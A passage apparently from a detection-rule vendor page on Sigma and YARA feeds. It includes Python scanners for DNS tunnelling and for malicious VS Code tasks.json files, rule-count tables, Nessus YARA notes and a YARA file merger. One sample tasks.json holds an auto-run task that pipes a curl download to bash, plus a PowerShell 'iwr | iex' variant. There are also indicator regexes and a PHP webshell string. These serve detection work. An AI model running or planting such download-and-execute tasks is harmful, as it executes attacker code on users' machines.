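if __name__ == "__main__":
    for r in scan(QUERIES):
        print(r["qname"], r["reasons"], "entropy", r["subdomain_entropy"])
```

A 53-byte payload becomes two base32 labels of 48 and 37 characters and a 104-character query name, tripping all three heuristics at once; the long but legitimate CDN name trips none, which is the trade-off the thresholds encode.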
Suspicious Download and Execution Pattern via VSCode Tasks
Detects suspicious patterns where Visual Studio Code (VSCode) spawns processes that both download and execute files, which may indicate abuse of the `tasks.json` configuration for malicious purposes.
This technique has been observed in campaigns such as "Contagious Interview," where adversaries leverage VSCode's workspace trust model to execute arbitrary code by embedding malicious commands in `tasks.json`.
Attackers may craft or alter `tasks.json` to automatically trigger downloads and execution of payloads when a user opens and trusts a workspace in VSCode, enabling initial access or further compromise.
02.04.2026
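Both VSCode/Cursor rules above key on a task that is wired to run when the folder is opened and whose command both fetches and executes something. The scanner below is an added example (not Nextron's Sigma rules) that parses a constructed tasks.json, including the comments and trailing commas VS Code tolerates, and grades each task; the download and execute indicator lists are assumptions.

```python
"""Scan a VS Code / Cursor tasks.json for tasks that auto-run on folder open and
both download and execute something.

Added example, not Nextron's Sigma rules. The sample tasks.json is constructed
and the indicator lists are assumptions.
"""
import json
import re

DOWNLOAD = re.compile(
    r"\b(?:curl|wget|bitsadmin|invoke-webrequest|iwr|start-bitstransfer|downloadstring|downloadfile)\b"
    r"|certutil\s+[^|;&]*-urlcache|https?://",
    re.I)
EXECUTE = re.compile(
    r"\|\s*(?:ba|z)?sh\b|\b(?:ba|z)?sh\s+-c\b|\bchmod\s+\+x\b|\biex\b|invoke-expression"
    r"|-encodedcommand\b|-enc\b|\bpython3?\b|\bnode\b|\bsource\b",
    re.I)


def _strip_jsonc(text):
    """tasks.json is JSONC: drop full-line // comments, block comments and trailing commas."""
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r",\s*([}\]])", r"\1", text)


def task_command_text(task):
    """Flatten command + args, including the per-OS overrides, into one string for matching."""
    parts = []
    for scope in (task, task.get("linux", {}), task.get("osx", {}), task.get("windows", {})):
        cmd = scope.get("command")
        if cmd:
            parts.append(cmd if isinstance(cmd, str) else " ".join(map(str, cmd)))
        for a in scope.get("args") or []:
            parts.append(a if isinstance(a, str) else str(a.get("value", a)))
    return " ".join(parts)


def scan_tasks(text):
    """Return one finding per task worth looking at, graded high/medium/info."""
    data = json.loads(_strip_jsonc(text))
    findings = []
    for task in data.get("tasks", []):
        cmdtext = task_command_text(task)
        auto = (task.get("runOptions") or {}).get("runOn") == "folderOpen"
        dl, ex = bool(DOWNLOAD.search(cmdtext)), bool(EXECUTE.search(cmdtext))
        sev = "high" if auto and dl and ex else "medium" if dl and ex else "info" if auto else None
        if sev:
            findings.append({"label": task.get("label"), "auto_run": auto, "download": dl,
                             "execute": ex, "severity": sev, "command": cmdtext})
    return findings


SAMPLE_TASKS_JSON = r'''{
    // constructed .vscode/tasks.json; comments and trailing commas are allowed by VS Code
    "version": "2.0.0",
    "tasks": [
        {"label": "build", "type": "shell", "command": "npm run build"},
        {"label": "deps", "type": "shell", "command": "npm install",
         "runOptions": {"runOn": "folderOpen"}},
        {"label": "setup", "type": "shell",
         "command": "curl -s http://198.51.100.7/env.sh | bash",
         "windows": {"command": "powershell", "args": ["-c", "iwr http://198.51.100.7/env.ps1 | iex"]},
         "runOptions": {"runOn": "folderOpen"},
         "presentation": {"reveal": "never"},
        },
    ]
}'''

if __name__ == "__main__":
    for f in scan_tasks(SAMPLE_TASKS_JSON):
        print(f["severity"], f["label"], "->", f["command"])
```

The "deps" task also runs on folder open but only gets an info-level note: an auto-run task on its own is a legitimate feature, and it is the combination with a download-and-execute command (here with the terminal hidden via presentation.reveal) that matches the technique the rules describe.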
YARA/SIGMA Rule Count
Rule Type | Community Feed | Nextron Private Feed
Yara | 2815 | 21223
Sigma | 3589 | 989
Sigma Rules Per Category (Community)
windows / process_creation: 1350
windows / registry_set: 219
windows / file_event: 209
windows / ps_script: 166
windows / security: 160
linux / process_creation: 139
windows / image_load: 114
webserver: 82
windows / system: 74
macos / process_creation: 69
aws / cloudtrail: 55
proxy: 54
windows / network_connection: 53
linux / auditd: 53
azure / activitylogs: 42
windows / registry_event: 40
azure / auditlogs: 38
windows / ps_module: 33
windows / application: 31
windows / dns_query: 27
windows / process_access: 25
opencanary / application: 24
azure / signinlogs: 24
okta / okta: 22
windows / pipe_created: 19
azure / riskdetection: 19
rpc_firewall / application: 17
windows / windefend: 17
gcp / gcp.audit: 16
linux: 16
github / audit: 15
linux / file_event: 15
bitbucket / audit: 14
m365 / threat_management: 13
cisco / aaa: 13
windows / file_delete: 13
windows / create_remote_thread: 12
windows / codeintegrity-operational: 10
dns: 10
windows / driver_load: 10
windows / registry_delete: 10
kubernetes / application / audit: 10
windows / ps_classic_start: 9
windows / appxdeployment-server: 9
windows / create_stream_hash: 9
windows / firewall-as: 8
windows / msexchange-management: 8
gcp / google_workspace.admin: 7
zeek / smb_files: 7
antivirus: 7
fortigate / event: 7
azure / pim: 7
windows / file_access: 7
windows / bits-client: 7
windows / dns-client: 6
kubernetes / audit: 6
zeek / dns: 5
linux / network_connection: 5
zeek / http: 5
jvm / application: 5
m365 / audit: 4
macos / file_event: 4
windows / sysmon: 4
windows / taskscheduler: 4
windows / iis-configuration: 4
zeek / dce_rpc: 4
windows / registry_add: 3
gcp / google_workspace.login: 3
linux / sshd: 3
windows / wmi_event: 3
windows / powershell-classic: 3
windows / ntlm: 3
linux / syslog: 2
windows / security-mitigations: 2
windows / dns-server: 2
spring / application: 2
apache: 2
onelogin / onelogin.events: 2
firewall: 2
linux / vsftpd: 1
windows / capi2: 1
windows / shell-core: 1
windows / file_change: 1
windows / raw_access_thread: 1
paloalto / file_event / globalprotect: 1
zeek / x509: 1
windows / certificateservicesclient-lifecycle-system: 1
nodejs / application: 1
paloalto / appliance / globalprotect: 1
windows / microsoft-servicebus-client: 1
python / application: 1
windows / diagnosis-scripted: 1
windows / file_executable_detected: 1
m365 / exchange: 1
zeek / rdp: 1
windows / smbclient-security: 1
windows / file_rename: 1
windows / sysmon_status: 1
ruby_on_rails / application: 1
m365 / threat_detection: 1
zeek / kerberos: 1
windows / terminalservices-localsessionmanager: 1
sql / application: 1
windows / driver-framework: 1
windows / sysmon_error: 1
velocity / application: 1
windows: 1
cisco / duo: 1
nginx: 1
linux / sudo: 1
cisco / bgp: 1
windows / ldap: 1
windows / wmi: 1
windows / dns-server-analytic: 1
database: 1
cisco / ldp: 1
windows / lsa-server: 1
windows / ps_classic_provider_start: 1
windows / printservice-operational: 1
linux / clamav: 1
django / application: 1
windows / printservice-admin: 1
windows / appmodel-runtime: 1
linux / auth: 1
linux / guacamole: 1
huawei / bgp: 1
windows / applocker: 1
windows / openssh: 1
fortios / sslvpnd: 1
linux / cron: 1
juniper / bgp: 1
windows / appxpackaging-om: 1
windows / process_tampering: 1
cisco / syslog: 1
windows / smbserver-connectivity: 1
windows / smbclient-connectivity: 1
Sigma Rules Per Category (Nextron Private Feed)
windows / process_creation: 483
windows / registry_set: 86
windows / ps_script: 85
linux / process_creation: 51
windows / file_event: 47
windows / image_load: 46
windows / wmi: 29
windows / security: 29
windows / system: 13
proxy: 12
windows / registry_event: 8
windows / network_connection: 8
windows / kernel-event-tracing: 6
windows / dns_query: 5
windows / ntfs: 5
windows / ps_module: 5
windows / create_remote_thread: 4
windows / registry_delete: 4
windows / sense: 4
windows / taskscheduler: 4
windows / pipe_created: 4
webserver: 3
windows / application-experience: 3
windows / driver_load: 3
windows / hyper-v-worker: 3
windows / ps_classic_script: 3
dns: 3
windows / vhd: 3
windows / windefend: 2
windows / process_access: 2
windows / process-creation: 2
windows / file_access: 2
windows / kernel-shimengine: 2
windows / file_delete: 2
windows / smbclient-security: 2
linux / file_event: 2
windows / bits-client: 2
macos / process_creation: 2
windows / codeintegrity-operational: 2
windows / amsi: 1
windows / application: 1
windows / registry_add: 1
windows / audit-cve: 1
windows / firewall-as: 1
windows / registry-setinformation: 1
windows / file_rename: 1
linux / file_delete: 1
Tenable Nessus
Requirement: Privileged Scan
- YARA Scanning with Nessus works only when scanning with credentials (privileged scan)
YARA Scanning with Nessus
- You can only upload a single .yar file
- Filesystem scan has to be activated
- You have to define the target locations
- The Nessus plugin ID will be 91990
- Only files with the following extensions can be scanned: .application, .asp, .aspx, .bat, .chm, .class, .cmd, .com, .cp, .csh, .dl, .doc, .docx, .drv, .exe, .gadget, .hta, .inf, .ins, .inx, .isu, .jar, .job, .jpeg, .jpg, .js, .jse, .jse, .jsp, .lnk, .msc, .msi, .msp, .mst, .paf, .pdf, .php, .pif, .ppt, .pptx, .ps1, .ps1xm, .ps2, .ps2xm, .psc1, .psc2, .reg, .rgs, .scf, .scr, .sct, .shb, .shs, .swf, .sys, .u3p, .vb, .vbe, .vbs, .vbscript, .ws, .wsf, .xls, .xls
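Because Nessus accepts only a single .yar file, a rule set that is maintained as several files has to be merged before upload, and the merge must hoist the module imports to the top and refuse duplicate rule names (yara rejects both a repeated import and a repeated rule name). The merger below is an added example, not Tenable or Next=ron code; the two rule files are constructed and the rule splitting relies on each rule starting on its own line, which is how yara sources are normally written.

```python
"""Merge several YARA files into the single .yar file Nessus accepts.

Added example, not Tenable or Nextron code. Imports are de-duplicated and
hoisted; a rule name seen twice is reported and the later copy is dropped.
Splitting assumes every rule header starts on its own line.
"""
import re

IMPORT_RE = re.compile(r'^\s*import\s+"([a-z_0-9]+)"\s*$', re.M)
RULE_RE = re.compile(r"^\s*(?:(?:private|global)\s+)*rule\s+([A-Za-z_][A-Za-z0-9_]*)", re.M)


def merge_yara_sources(sources):
    """sources: {filename: yara_text}. Returns (merged_text, report)."""
    imports, rules, seen = [], [], {}
    report = {"duplicates": [], "rule_count": 0}
    for fname, text in sources.items():
        for mod in IMPORT_RE.findall(text):
            if mod not in imports:
                imports.append(mod)
        body = IMPORT_RE.sub("", text)
        heads = list(RULE_RE.finditer(body))
        for i, head in enumerate(heads):
            end = heads[i + 1].start() if i + 1 < len(heads) else len(body)
            name = head.group(1)
            if name in seen:  # yara would refuse the whole file on a duplicate identifier
                report["duplicates"].append((name, seen[name], fname))
                continue
            seen[name] = fname
            rules.append(f"// source: {fname}\n{body[head.start():end].strip()}\n")
    report["rule_count"] = len(rules)
    merged = "".join(f'import "{m}"\n' for m in imports) + "\n" + "\n".join(rules)
    return merged, report


SOURCES = {  # constructed rule files
    "drivers.yar": '''
import "pe"

rule Example_Driver_A
{
    meta:
        description = "constructed example"
    condition:
        uint16(0) == 0x5a4d and pe.version_info["OriginalFilename"] == "example.sys"
}

rule Shared_Name
{
    strings:
        $a = "alpha"
    condition:
        $a
}
''',
    "webshells.yar": '''
import "pe"
import "hash"

rule Shared_Name
{
    strings:
        $b = "beta"
    condition:
        $b
}

private rule Example_Webshell_B
{
    strings:
        $s = "<?php eval("
    condition:
        $s
}
''',
}

if __name__ == "__main__":
    merged, report = merge_yara_sources(SOURCES)
    print(report)
    with open("nessus_upload.yar", "w") as fh:
        fh.write(merged)
```

Run the result through yara itself (for instance compile it once against an empty file) before uploading; the merger catches duplicate identifiers but not every way two independently written files can conflict.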
